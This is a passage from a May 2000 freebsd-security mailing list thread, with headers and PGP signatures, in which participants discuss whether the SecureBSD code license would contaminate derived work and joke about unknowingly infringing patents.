Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.0.2 Comment: FreeBSD, NetBSD, OpenBSD, and BSDi - There's nuthin' else. iQA/AwUBOSbs+YYwDkcZSgMYEQIrZQCfaEIkk/ydUMuJPxyk0OUfwF8bHZoAn0lH gKgoU1UpRAXRARoAXhzEpEPH =xUYp -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 20 13:16:31 2000 Delivered-To: freebsd-security@freebsd.org Received: from zippy.cdrom.com (zippy.cdrom.com [204.216.27.228]) by hub.freebsd.org (Postfix) with ESMTP id B04F437B6A1; Sat, 20 May 2000 13:16:28 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) Received: from localhost (jkh@localhost [127.0.0.1]) by zippy.cdrom.com (8.9.3/8.9.3) with ESMTP id NAA90711; Sat, 20 May 2000 13:18:54 -0700 (PDT) (envelope-from jkh@zippy.cdrom.com) To: Kris Kennaway Cc: "Jordan K. Hubbard" , security@FreeBSD.org Subject: Re: The SecureBSD stuff is now available for download In-reply-to: Your message of "Sat, 20 May 2000 12:41:06 PDT." Date: Sat, 20 May 2000 13:18:54 -0700 Message-ID: <90708.958853934@localhost> From: "Jordan K. Hubbard" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Actually, we shouldn't, because the license will contaminate any derived > work. Hmmm. I just read the license agreement (thanks for the prod) and I have to agree that it looks pretty scary. Still, most things in the security arena are "obvious" enough that one could just as easily get sued by someone claiming infringement whether you ever looked at their code or not. I don't think anyone since AT&T has tried to argue the "contamination" angle, they just sue you for infringing their ideas whether you were ever acquainted with those ideas before or not. In other words, we're probably already screwed from a strictly legal perspective, and I'm not even just talking about security. I wonder how many patents we're infringing without even knowing about it. :) - Jordan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 20 13:25:46 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.enteract.com (mail.enteract.com [207.229.143.33]) by hub.freebsd.org (Postfix) with ESMTP id CBA5237B6F2; Sat, 20 May 2000 13:25:43 -0700 (PDT) (envelope-from bitsurfr@enteract.com) Received: from bugsbunny (216-80-34-42.d.enteract.com [216.80.34.42]) by mail.enteract.com (8.9.3/8.9.3) with SMTP id PAA41840; Sat, 20 May 2000 15:25:41 -0500 (CDT) (envelope-from bitsurfr@enteract.com) From: "Chris Silva" To: "Jordan K. Hubbard" , "Kris Kennaway" Cc: Subject: RE: The SecureBSD stuff is now available for download Date: Sat, 20 May 2000 15:25:04 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) In-Reply-To: <90708.958853934@localhost> Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Jordan K. Hubbard Sent: Saturday, May 20, 2000 3:19 PM To: Kris Kennaway Cc: Jordan K. Hubbard; security@FreeBSD.org Subject: Re: The SecureBSD stuff is now available for download - -> Snip... !In other words, we're probably already screwed from a strictly legal !perspective, and I'm not even just talking about security. I wonder !how many patents we're infringing without even knowing about it. :) ! !- Jordan Yikes!!! Just what we need to hear... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message -----BEGIN PGP SIGNATURE----- Version: PGP Personal Privacy 6.0.2 Comment: FreeBSD, NetBSD, OpenBSD, and BSDi - There's nuthin' else. iQA/AwUBOSb0n4YwDkcZSgMYEQIG4ACeLYalzQz1p3olNfYLIjUd/butqm4An1Sh tRc0wkSwGEdVV1uC3mrkoGG+ =xwXY -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message